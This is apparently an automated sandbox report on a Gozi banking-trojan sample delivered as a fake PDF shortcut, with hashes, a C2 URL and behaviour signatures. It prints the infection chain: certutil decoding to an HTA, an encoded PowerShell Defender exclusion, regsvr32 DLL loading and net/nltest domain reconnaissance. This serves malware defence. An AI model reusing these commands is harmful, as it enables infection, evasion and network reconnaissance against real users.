gozi | d37a1ad57c494e0a18f57ec18615582c270e8c74fdf5c01005e1cb42fcdb3aa7

Analysis

max time kernel
148s
max time network
154s
platform
windows7_x64
resource
win7-20230220-en
resource tags

arch:x64arch:x86image:win7-20230220-enlocale:en-usos:windows7-x64system
submitted
23-02-2023 09:26

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

metaplatform02.pdf..lnk
Size

293.6MB
MD5

d8564cb88267993101b3f0f54048c6a4
SHA1

75dad371e05629179c7e30bd24a068553336aefd
SHA256

e80e664931e44044b7d162100524858755203db39402ddc8f816a508404ea3c5
SHA512

a41b87daa0aea3057a4e1cdd29a7aa81e488880e714139529c75bc714ac803dd43e6a0acac143d2c3edbfac4582205c66e822c4561e817a4337fcb910abb0d57
SSDEEP

24576:87MkCMWioaEMPQjw1coi5qsSrKz6Fwoh73sVDGSQ7wqfU:0hQRoAz6quxhC

Score

10^/10

gozi 1000 banker ldr4 trojan

Malware Config

Extracted

Family

gozi

Extracted

Family

gozi

Botnet

1000

https://colodart.top

Attributes

host_keep_time
2
host_shift_time
1
idle_time
1
request_time
10

aes.plain

Signatures

Gozi
Gozi is a well-known and widely distributed banking trojan.
banker trojan gozi
Blocklisted process makes network request 5 IoCs

Processes:

mshta.exe

flow pid process

4 1628 mshta.exe
6 1628 mshta.exe
8 1628 mshta.exe
10 1628 mshta.exe
12 1628 mshta.exe
Loads dropped DLL 2 IoCs

Processes:

regsvr32.exeregsvr32.exe

pid process

1088 regsvr32.exe
1652 regsvr32.exe
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082
Delays execution with timeout.exe 2 IoCs
evasion

Processes:

timeout.exetimeout.exe

pid process

112 timeout.exe
1080 timeout.exe

flow	pid	process
4	1628	mshta.exe
6	1628	mshta.exe
8	1628	mshta.exe
10	1628	mshta.exe
12	1628	mshta.exe

pid	process
1088	regsvr32.exe
1652	regsvr32.exe

pid	process
112	timeout.exe
1080	timeout.exe

Modifies system certificate store 2 TTPs 6 IoCs

evasion spyware trojan

Install Root Certificate

T1130

Modify Registry

T1112

Processes:

mshta.exe

description	ioc	process
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\CABD2A79A1076A31F21D253635CB039D4329A5E8	mshta.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\CABD2A79A1076A31F21D253635CB039D4329A5E8\Blob = 0400000001000000100000000cd2f9e0da1773e9ed864da5e370e74e14000000010000001400000079b459e67bb6e5e40173800888c81a58f6e99b6e030000000100000014000000cabd2a79a1076a31f21d253635cb039d4329a5e80f00000001000000200000003f0411ede9c4477057d57e57883b1f205b20cdc0f3263129b1ee0269a2678f631900000001000000100000002fe1f70bb05d7c92335bc5e05b984da620000000010000006f0500003082056b30820353a0030201020211008210cfb0d240e3594463e0bb63828b00300d06092a864886f70d01010b0500304f310b300906035504061302555331293027060355040a1320496e7465726e65742053656375726974792052657365617263682047726f7570311530130603550403130c4953524720526f6f74205831301e170d3135303630343131303433385a170d3335303630343131303433385a304f310b300906035504061302555331293027060355040a1320496e7465726e65742053656375726974792052657365617263682047726f7570311530130603550403130c4953524720526f6f7420583130820222300d06092a864886f70d01010105000382020f003082020a0282020100ade82473f41437f39b9e2b57281c87bedcb7df38908c6e3ce657a078f775c2a2fef56a6ef6004f28dbde68866c4493b6b163fd14126bbf1fd2ea319b217ed1333cba48f5dd79dfb3b8ff12f1219a4bc18a8671694a66666c8f7e3c70bfad292206f3e4c0e680aee24b8fb7997e94039fd347977c99482353e838ae4f0a6f832ed149578c8074b6da2fd0388d7b0370211b75f2303cfa8faeddda63abeb164fc28e114b7ecf0be8ffb5772ef4b27b4ae04c12250c708d0329a0e15324ec13d9ee19bf10b34a8c3f89a36151deac870794f46371ec2ee26f5b9881e1895c34796c76ef3b906279e6dba49a2f26c5d010e10eded9108e16fbb7f7a8f7c7e50207988f360895e7e237960d36759efb0e72b11d9bbc03f94905d881dd05b42ad641e9ac0176950a0fd8dfd5bd121f352f28176cd298c1a80964776e4737baceac595e689d7f72d689c50641293e593edd26f524c911a75aa34c401f46a199b5a73a516e863b9e7d72a712057859ed3e5178150b038f8dd02f05b23e7b4a1c4b730512fcc6eae050137c439374b3ca74e78e1f0108d030d45b7136b407bac130305c48b7823b98a67d608aa2a32982ccbabd83041ba2830341a1d605f11bc2b6f0a87c863b46a8482a88dc769a76bf1f6aa53d198feb38f364dec82b0d0a28fff7dbe21542d422d0275de179fe18e77088ad4ee6d98b3ac6dd27516effbc64f533434f0203010001a3423040300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff301d0603551d0e0416041479b459e67bb6e5e40173800888c81a58f6e99b6e300d06092a864886f70d01010b05000382020100551f58a9bcb2a850d00cb1d81a6920272908ac61755c8a6ef882e5692fd5f6564bb9b8731059d321977ee74c71fbb2d260ad39a80bea17215685f1500e59ebcee059e9bac915ef869d8f8480f6e4e99190dc179b621b45f06695d27c6fc2ea3bef1fcfcbd6ae27f1a9b0c8aefd7d7e9afa2204ebffd97fea912b22b1170e8ff28a345b58d8fc01c954b9b826cc8a8833894c2d843c82dfee965705ba2cbbf7c4b7c74e3b82be31c822737392d1c280a43939103323824c3c9f86b255981dbe29868c229b9ee26b3b573a82704ddc09c789cb0a074d6ce85d8ec9efceabc7bbb52b4e45d64ad026cce572ca086aa595e315a1f7a4edc92c5fa5fbffac28022ebed77bbbe3717b9016d3075e46537c3707428cd3c4969cd599b52ae0951a8048ae4c3907cecc47a452952bbab8fbadd233537de51d4d6dd5a1b1c7426fe64027355ca328b7078de78d3390e7239ffb509c796c46d5b415b3966e7e9b0c963ab8522d3fd65be1fb08c284fe24a8a389daac6ae1182ab1a843615bd31fdc3b8d76f22de88d75df17336c3d53fb7bcb415fffdca2d06138e196b8ac5d8b37d775d533c09911ae9d41c1727584be0241425f67244894d19b27be073fb9b84f817451e17ab7ed9d23e2bee0d52804133c31039edd7a6c8fc60718c67fde478e3f289e0406cfa5543477bdec899be91743df5bdb5ffe8e1e57a2cd409d7e6222dade1827	mshta.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DAC9024F54D8F6DF94935FB1732638CA6AD77C13	mshta.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DAC9024F54D8F6DF94935FB1732638CA6AD77C13\Blob = 0f00000001000000140000005bcaa1c2780f0bcb5a90770451d96f38963f012d0b000000010000001e000000440053005400200052006f006f0074002000430041002000580033000000090000000100000016000000301406082b0601050507030406082b06010505070301140000000100000014000000c4a7b1a47b2c71fadbe14b9075ffc415608589101d00000001000000100000004558d512eecb27464920897de7b66053030000000100000014000000dac9024f54d8f6df94935fb1732638ca6ad77c1320000000010000004e0300003082034a30820232a003020102021044afb080d6a327ba893039862ef8406b300d06092a864886f70d0101050500303f31243022060355040a131b4469676974616c205369676e617475726520547275737420436f2e311730150603550403130e44535420526f6f74204341205833301e170d3030303933303231313231395a170d3231303933303134303131355a303f31243022060355040a131b4469676974616c205369676e617475726520547275737420436f2e311730150603550403130e44535420526f6f7420434120583330820122300d06092a864886f70d01010105000382010f003082010a0282010100dfafe99750088357b4cc6265f69082ecc7d32c6b30ca5becd9c37dc740c118148be0e83376492ae33f214993ac4e0eaf3e48cb65eefcd3210f65d22ad9328f8ce5f777b0127bb595c089a3a9baed732e7a0c063283a27e8a1430cd11a0e12a38b9790a31fd50bd8065dfb7516383c8e28861ea4b6181ec526bb9a2e24b1a289f48a39e0cda098e3e172e1edd20df5bc62a8aab2ebd70adc50b1a25907472c57b6aab34d63089ffe568137b540bc8d6aeec5a9c921e3d64b38cc6dfbfc94170ec1672d526ec38553943d0fcfd185c40f197ebd59a9b8d1dbada25b9c6d8dfc115023aabda6ef13e2ef55c089c3cd68369e4109b192ab62957e3e53d9b9ff0025d0203010001a3423040300f0603551d130101ff040530030101ff300e0603551d0f0101ff040403020106301d0603551d0e04160414c4a7b1a47b2c71fadbe14b9075ffc41560858910300d06092a864886f70d01010505000382010100a31a2c9b17005ca91eee2866373abf83c73f4bc309a095205de3d95944d23e0d3ebd8a4ba0741fce10829c741a1d7e981addcb134bb32044e491e9ccfc7da5db6ae5fee6fde04eddb7003ab57049aff2e5eb02f1d1028b19cb943a5e48c4181e58195f1e025af00cf1b1ada9dc59868b6ee991f586cafab96633aa595bcee2a7167347cb2bcc99b03748cfe3564bf5cf0f0c723287c6f044bb53726d43f526489a5267b758abfe67767178db0da256141339243185a2a8025a3047e1dd5007bc02099000eb6463609b16bc88c912e6d27d918bf93d328d65b4e97cb15776eac5b62839bf15651cc8f677966a0a8d770bd8910b048e07db29b60aee9d82353510	mshta.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DAC9024F54D8F6DF94935FB1732638CA6AD77C13\Blob = 1900000001000000100000006cf252fec3e8f20996de5d4dd9aef424030000000100000014000000dac9024f54d8f6df94935fb1732638ca6ad77c131d00000001000000100000004558d512eecb27464920897de7b66053140000000100000014000000c4a7b1a47b2c71fadbe14b9075ffc41560858910090000000100000016000000301406082b0601050507030406082b060105050703010b000000010000001e000000440053005400200052006f006f00740020004300410020005800330000000f00000001000000140000005bcaa1c2780f0bcb5a90770451d96f38963f012d20000000010000004e0300003082034a30820232a003020102021044afb080d6a327ba893039862ef8406b300d06092a864886f70d0101050500303f31243022060355040a131b4469676974616c205369676e617475726520547275737420436f2e311730150603550403130e44535420526f6f74204341205833301e170d3030303933303231313231395a170d3231303933303134303131355a303f31243022060355040a131b4469676974616c205369676e617475726520547275737420436f2e311730150603550403130e44535420526f6f7420434120583330820122300d06092a864886f70d01010105000382010f003082010a0282010100dfafe99750088357b4cc6265f69082ecc7d32c6b30ca5becd9c37dc740c118148be0e83376492ae33f214993ac4e0eaf3e48cb65eefcd3210f65d22ad9328f8ce5f777b0127bb595c089a3a9baed732e7a0c063283a27e8a1430cd11a0e12a38b9790a31fd50bd8065dfb7516383c8e28861ea4b6181ec526bb9a2e24b1a289f48a39e0cda098e3e172e1edd20df5bc62a8aab2ebd70adc50b1a25907472c57b6aab34d63089ffe568137b540bc8d6aeec5a9c921e3d64b38cc6dfbfc94170ec1672d526ec38553943d0fcfd185c40f197ebd59a9b8d1dbada25b9c6d8dfc115023aabda6ef13e2ef55c089c3cd68369e4109b192ab62957e3e53d9b9ff0025d0203010001a3423040300f0603551d130101ff040530030101ff300e0603551d0f0101ff040403020106301d0603551d0e04160414c4a7b1a47b2c71fadbe14b9075ffc41560858910300d06092a864886f70d01010505000382010100a31a2c9b17005ca91eee2866373abf83c73f4bc309a095205de3d95944d23e0d3ebd8a4ba0741fce10829c741a1d7e981addcb134bb32044e491e9ccfc7da5db6ae5fee6fde04eddb7003ab57049aff2e5eb02f1d1028b19cb943a5e48c4181e58195f1e025af00cf1b1ada9dc59868b6ee991f586cafab96633aa595bcee2a7167347cb2bcc99b03748cfe3564bf5cf0f0c723287c6f044bb53726d43f526489a5267b758abfe67767178db0da256141339243185a2a8025a3047e1dd5007bc02099000eb6463609b16bc88c912e6d27d918bf93d328d65b4e97cb15776eac5b62839bf15651cc8f677966a0a8d770bd8910b048e07db29b60aee9d82353510	mshta.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DAC9024F54D8F6DF94935FB1732638CA6AD77C13\Blob = 040000000100000010000000410352dc0ff7501b16f0028eba6f45c50f00000001000000140000005bcaa1c2780f0bcb5a90770451d96f38963f012d0b000000010000001e000000440053005400200052006f006f0074002000430041002000580033000000090000000100000016000000301406082b0601050507030406082b06010505070301140000000100000014000000c4a7b1a47b2c71fadbe14b9075ffc415608589101d00000001000000100000004558d512eecb27464920897de7b66053030000000100000014000000dac9024f54d8f6df94935fb1732638ca6ad77c131900000001000000100000006cf252fec3e8f20996de5d4dd9aef42420000000010000004e0300003082034a30820232a003020102021044afb080d6a327ba893039862ef8406b300d06092a864886f70d0101050500303f31243022060355040a131b4469676974616c205369676e617475726520547275737420436f2e311730150603550403130e44535420526f6f74204341205833301e170d3030303933303231313231395a170d3231303933303134303131355a303f31243022060355040a131b4469676974616c205369676e617475726520547275737420436f2e311730150603550403130e44535420526f6f7420434120583330820122300d06092a864886f70d01010105000382010f003082010a0282010100dfafe99750088357b4cc6265f69082ecc7d32c6b30ca5becd9c37dc740c118148be0e83376492ae33f214993ac4e0eaf3e48cb65eefcd3210f65d22ad9328f8ce5f777b0127bb595c089a3a9baed732e7a0c063283a27e8a1430cd11a0e12a38b9790a31fd50bd8065dfb7516383c8e28861ea4b6181ec526bb9a2e24b1a289f48a39e0cda098e3e172e1edd20df5bc62a8aab2ebd70adc50b1a25907472c57b6aab34d63089ffe568137b540bc8d6aeec5a9c921e3d64b38cc6dfbfc94170ec1672d526ec38553943d0fcfd185c40f197ebd59a9b8d1dbada25b9c6d8dfc115023aabda6ef13e2ef55c089c3cd68369e4109b192ab62957e3e53d9b9ff0025d0203010001a3423040300f0603551d130101ff040530030101ff300e0603551d0f0101ff040403020106301d0603551d0e04160414c4a7b1a47b2c71fadbe14b9075ffc41560858910300d06092a864886f70d01010505000382010100a31a2c9b17005ca91eee2866373abf83c73f4bc309a095205de3d95944d23e0d3ebd8a4ba0741fce10829c741a1d7e981addcb134bb32044e491e9ccfc7da5db6ae5fee6fde04eddb7003ab57049aff2e5eb02f1d1028b19cb943a5e48c4181e58195f1e025af00cf1b1ada9dc59868b6ee991f586cafab96633aa595bcee2a7167347cb2bcc99b03748cfe3564bf5cf0f0c723287c6f044bb53726d43f526489a5267b758abfe67767178db0da256141339243185a2a8025a3047e1dd5007bc02099000eb6463609b16bc88c912e6d27d918bf93d328d65b4e97cb15776eac5b62839bf15651cc8f677966a0a8d770bd8910b048e07db29b60aee9d82353510	mshta.exe

Runs net.exe
Suspicious behavior: CmdExeWriteProcessMemorySpam 1 IoCs

Processes:

mshta.exe

pid process

1628 mshta.exe
Suspicious behavior: EnumeratesProcesses 1 IoCs

Processes:

powershell.exe

pid process

1788 powershell.exe
Suspicious use of AdjustPrivilegeToken 1 IoCs

Processes:

powershell.exe

description pid process

Token: SeDebugPrivilege 1788 powershell.exe

pid	process
1628	mshta.exe

pid	process
1788	powershell.exe

description	pid	process
Token: SeDebugPrivilege	1788	powershell.exe

Suspicious use of WriteProcessMemory 51 IoCs

Processes:

cmd.execmd.exemshta.exepowershell.exeregsvr32.exeregsvr32.execmd.exenet.execmd.exe

description	pid	process	target process
PID 1400 wrote to memory of 688	1400	cmd.exe	cmd.exe
PID 1400 wrote to memory of 688	1400	cmd.exe	cmd.exe
PID 1400 wrote to memory of 688	1400	cmd.exe	cmd.exe
PID 688 wrote to memory of 1496	688	cmd.exe	certutil.exe
PID 688 wrote to memory of 1496	688	cmd.exe	certutil.exe
PID 688 wrote to memory of 1496	688	cmd.exe	certutil.exe
PID 688 wrote to memory of 1628	688	cmd.exe	mshta.exe
PID 688 wrote to memory of 1628	688	cmd.exe	mshta.exe
PID 688 wrote to memory of 1628	688	cmd.exe	mshta.exe
PID 688 wrote to memory of 1628	688	cmd.exe	mshta.exe
PID 1628 wrote to memory of 112	1628	mshta.exe	timeout.exe
PID 1628 wrote to memory of 112	1628	mshta.exe	timeout.exe
PID 1628 wrote to memory of 112	1628	mshta.exe	timeout.exe
PID 1628 wrote to memory of 112	1628	mshta.exe	timeout.exe
PID 1628 wrote to memory of 1788	1628	mshta.exe	powershell.exe
PID 1628 wrote to memory of 1788	1628	mshta.exe	powershell.exe
PID 1628 wrote to memory of 1788	1628	mshta.exe	powershell.exe
PID 1628 wrote to memory of 1788	1628	mshta.exe	powershell.exe
PID 1788 wrote to memory of 1080	1788	powershell.exe	timeout.exe
PID 1788 wrote to memory of 1080	1788	powershell.exe	timeout.exe
PID 1788 wrote to memory of 1080	1788	powershell.exe	timeout.exe
PID 1788 wrote to memory of 1080	1788	powershell.exe	timeout.exe
PID 1628 wrote to memory of 1088	1628	mshta.exe	regsvr32.exe
PID 1628 wrote to memory of 1088	1628	mshta.exe	regsvr32.exe
PID 1628 wrote to memory of 1088	1628	mshta.exe	regsvr32.exe
PID 1628 wrote to memory of 1088	1628	mshta.exe	regsvr32.exe
PID 1628 wrote to memory of 1088	1628	mshta.exe	regsvr32.exe
PID 1628 wrote to memory of 1088	1628	mshta.exe	regsvr32.exe
PID 1628 wrote to memory of 1088	1628	mshta.exe	regsvr32.exe
PID 1088 wrote to memory of 1652	1088	regsvr32.exe	regsvr32.exe
PID 1088 wrote to memory of 1652	1088	regsvr32.exe	regsvr32.exe
PID 1088 wrote to memory of 1652	1088	regsvr32.exe	regsvr32.exe
PID 1088 wrote to memory of 1652	1088	regsvr32.exe	regsvr32.exe
PID 1088 wrote to memory of 1652	1088	regsvr32.exe	regsvr32.exe
PID 1088 wrote to memory of 1652	1088	regsvr32.exe	regsvr32.exe
PID 1088 wrote to memory of 1652	1088	regsvr32.exe	regsvr32.exe
PID 1652 wrote to memory of 852	1652	regsvr32.exe	cmd.exe
PID 1652 wrote to memory of 852	1652	regsvr32.exe	cmd.exe
PID 1652 wrote to memory of 852	1652	regsvr32.exe	cmd.exe
PID 852 wrote to memory of 1304	852	cmd.exe	net.exe
PID 852 wrote to memory of 1304	852	cmd.exe	net.exe
PID 852 wrote to memory of 1304	852	cmd.exe	net.exe
PID 1304 wrote to memory of 1868	1304	net.exe	net1.exe
PID 1304 wrote to memory of 1868	1304	net.exe	net1.exe
PID 1304 wrote to memory of 1868	1304	net.exe	net1.exe
PID 1652 wrote to memory of 968	1652	regsvr32.exe	cmd.exe
PID 1652 wrote to memory of 968	1652	regsvr32.exe	cmd.exe
PID 1652 wrote to memory of 968	1652	regsvr32.exe	cmd.exe
PID 968 wrote to memory of 920	968	cmd.exe	nltest.exe
PID 968 wrote to memory of 920	968	cmd.exe	nltest.exe
PID 968 wrote to memory of 920	968	cmd.exe	nltest.exe

C:\Windows\system32\cmd.exe
cmd /c C:\Users\Admin\AppData\Local\Temp\metaplatform02.pdf..lnk
1⤵
- Suspicious use of WriteProcessMemory
PID:1400

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c if exist C:\Users\Admin\AppData\Local\Temp\temp1_mplatform.zip\metaplatform02.pdf..lnk (certutil.exe -decode C:\Users\Admin\AppData\Local\Temp\temp1_mplatform.zip\metaplatform02.pdf..lnk C:\Users\Admin\AppData\Local\Temp\.hta&start C:\Users\Admin\AppData\Local\Temp\.hta)else (certutil -decode metaplatform02.pdf..lnk C:\Users\Admin\AppData\Local\Temp\.hta&start C:\Users\Admin\AppData\Local\Temp\.hta)
2⤵
- Suspicious use of WriteProcessMemory
PID:688

C:\Windows\system32\certutil.exe
certutil -decode metaplatform02.pdf..lnk C:\Users\Admin\AppData\Local\Temp\.hta
3⤵
PID:1496

C:\Windows\SysWOW64\mshta.exe
"C:\Windows\SysWOW64\mshta.exe" "C:\Users\Admin\AppData\Local\Temp\.hta"
3⤵
- Blocklisted process makes network request
- Modifies system certificate store
- Suspicious behavior: CmdExeWriteProcessMemorySpam
- Suspicious use of WriteProcessMemory
PID:1628

C:\Windows\SysWOW64\timeout.exe
"C:\Windows\System32\timeout.exe" /t 30
4⤵
- Delays execution with timeout.exe
PID:112

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -enc QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgACIAQwA6AFwAIgA7AHQAaQBtAGUAbwB1AHQAIAAxADUA
4⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1788

C:\Windows\SysWOW64\timeout.exe
"C:\Windows\system32\timeout.exe" 15
5⤵
- Delays execution with timeout.exe
PID:1080

C:\Windows\SysWOW64\regsvr32.exe
regsvr32 /s C:\Users\Admin\AppData\Local\Temp\x.dll
4⤵
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:1088

C:\Windows\system32\regsvr32.exe
/s C:\Users\Admin\AppData\Local\Temp\x.dll
5⤵
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:1652

C:\Windows\system32\cmd.exe
cmd /c "net group "domain computers" /domain" >> C:\Users\Admin\AppData\Local\Temp\6BF4.tmp
6⤵
- Suspicious use of WriteProcessMemory
PID:852

C:\Windows\system32\net.exe
net group "domain computers" /domain
7⤵
- Suspicious use of WriteProcessMemory
PID:1304

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 group "domain computers" /domain
8⤵
PID:1868

C:\Windows\system32\cmd.exe
cmd /c "nltest /dclist:" >> C:\Users\Admin\AppData\Local\Temp\8E3C.tmp
6⤵
- Suspicious use of WriteProcessMemory
PID:968

C:\Windows\system32\nltest.exe
nltest /dclist:
7⤵
PID:920

Network

MITRE ATT&CK Matrix ATT&CK v6

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Install Root Certificate

T1130

Modify Registry

T1112

Credential Access

Discovery

System Information Discovery

T1082

Lateral Movement

Collection

Exfiltration

Command and Control

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
Filesize
342B

MD5
9d46260af005955562fb20a7e239935d

SHA1
b8683d11bba116df7a9c4c47f8b559cfd92a76bf

SHA256
2573e7f92603acce294e75d6e01200a0a7d096c9eab3f831bb627ece751cecd1

SHA512
d6d76a2aa826dfd29fe482ccaed42df7a649fc820938f57210a89561bfec30343cdf9279147a039614d0d3d288830a68bcbb499fc12d69c8603764a9af8a7a5e

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
Filesize
342B

MD5
666e4b976a62d75de82555987a191598

SHA1
cde39eceaf0b33bfd0449d331ea85b271c42fd71

SHA256
1f6be49e3f26ba11984cae3f1fecbfd52d037139dcf3d18bfa90ddf1a4192e42

SHA512
b5e8c3484efd4e2f4d0a1553a2239adf09aa875a496d851d067e94ebfc971080484e02204f3c51ea0dc61145172f52cca85f6abbd29b5d790d1553dd9bcfa74c

Download Submit
C:\Users\Admin\AppData\Local\Temp\.hta
Filesize
29.4MB

MD5
31c3b2996567f246db9e134fd2f0df7d

SHA1
4b7c90a53bf6b56e64fff86ba87a27aa742e9310

SHA256
9738aa16bc292b49423c290c09136c40d0e08727595f7e8e5a44496bb4af7228

SHA512
e30d7170d743a8bfe0e8b4c44d6ed82a901c0289c8f595ae18e74dc80f5a67813babb3de39f5ed72cdf522e2868024eeb467a2907d5e8056e8a7017735625613

Download Submit
C:\Users\Admin\AppData\Local\Temp\6BF4.tmp
Filesize
78B

MD5
aaec14b2de8e2fdaf8427672122af65c

SHA1
ca953efad669c93af85b968d747baa544d4465fb

SHA256
14c94c44d0eb89a820d96e1791f4b754c87ee778b5f4478289df0fb22e1c3da1

SHA512
a5cbad3de5070fdcd6aa7f3f5eda42b69faef44a431cf48e20ca1f4f42c648ee80bd5f1d9b981624ae6b39e2435b4278c9fd1e97491e3b244a2bba7d629021a8

Download Submit
C:\Users\Admin\AppData\Local\Temp\8E3C.tmp
Filesize
36B

MD5
c58986635c266e6c06609b908580bede

SHA1
4672dce03d3dd9560cf74035aff3d9aebb7201e4

SHA256
a2f1bb2817f976e129974b003e3ec12fb8a644c1952bb667116317fd26416042

SHA512
36241e4bda8ad7e4137624bbfbb999c643d34a2095ba078f9886d92f4726913bdb9dc1e1f44141a6738c1e4d9042b802e49f774c0f1c6901735f4b069834449f

Download Submit
C:\Users\Admin\AppData\Local\Temp\Cab46C3.tmp
Filesize
61KB

MD5
fc4666cbca561e864e7fdf883a9e6661

SHA1
2f8d6094c7a34bf12ea0bbf0d51ee9c5bb7939a5

SHA256
10f3deb6c452d749a7451b5d065f4c0449737e5ee8a44f4d15844b503141e65b

SHA512
c71f54b571e01f247f072be4bbebdf5d8410b67eb79a61e7e0d9853fe857ab9bd12f53e6af3394b935560178107291fc4be351b27deb388eba90ba949633d57d

Download Submit
C:\Users\Admin\AppData\Local\Temp\Tar4753.tmp
Filesize
161KB

MD5
73b4b714b42fc9a6aaefd0ae59adb009

SHA1
efdaffd5b0ad21913d22001d91bf6c19ecb4ac41

SHA256
c0cf8cc04c34b5b80a2d86ad0eafb2dd71436f070c86b0321fba0201879625fd

SHA512
73af3c51b15f89237552b1718bef21fd80788fa416bab2cb2e7fb3a60d56249a716eda0d2dd68ab643752272640e7eaaaf57ce64bcb38373ddc3d035fb8d57cd

Download Submit
C:\Users\Admin\AppData\Local\Temp\x.dll
Filesize
334.4MB

MD5
12385eaa57c3fc38cb2e10ea348a14d0

SHA1
a49dfb815c67d47326f4d823ad8b79101e099754

SHA256
31a4be5978fffc0eadb06152d391ec6b9884c71c8956ef204dd85695e8724976

SHA512
dea2270662875f520325b38e4d18692cae0d4286c52dab93ba5c6fe62c34d9554743645526214960daef8cae50d0730f377bcf7ae74faacea489c3d6c037111a

Download Submit
\Users\Admin\AppData\Local\Temp\x.dll
Filesize
334.4MB

MD5
12385eaa57c3fc38cb2e10ea348a14d0

SHA1
a49dfb815c67d47326f4d823ad8b79101e099754

SHA256
31a4be5978fffc0eadb06152d391ec6b9884c71c8956ef204dd85695e8724976

SHA512
dea2270662875f520325b38e4d18692cae0d4286c52dab93ba5c6fe62c34d9554743645526214960daef8cae50d0730f377bcf7ae74faacea489c3d6c037111a

Download Submit
\Users\Admin\AppData\Local\Temp\x.dll
Filesize
334.4MB

MD5
12385eaa57c3fc38cb2e10ea348a14d0

SHA1
a49dfb815c67d47326f4d823ad8b79101e099754

SHA256
31a4be5978fffc0eadb06152d391ec6b9884c71c8956ef204dd85695e8724976

SHA512
dea2270662875f520325b38e4d18692cae0d4286c52dab93ba5c6fe62c34d9554743645526214960daef8cae50d0730f377bcf7ae74faacea489c3d6c037111a

Download Submit
memory/1652-214-0x0000000000120000-0x0000000000121000-memory.dmp

Filesize
4KB

Download
memory/1652-212-0x00000000002F0000-0x0000000000303000-memory.dmp

Filesize
76KB

Download
memory/1652-208-0x0000000180000000-0x0000000180014000-memory.dmp

Filesize
80KB

Download
memory/1652-206-0x0000000001ED0000-0x0000000001F83000-memory.dmp

Filesize
716KB

Download
memory/1652-236-0x0000000001ED0000-0x0000000001F83000-memory.dmp

Filesize
716KB

Download
memory/1652-243-0x0000000001ED0000-0x0000000001F83000-memory.dmp

Filesize
716KB

Download
memory/1788-201-0x0000000002510000-0x0000000002550000-memory.dmp

Filesize
256KB

Download
memory/1788-200-0x0000000002510000-0x0000000002550000-memory.dmp

Filesize
256KB

Download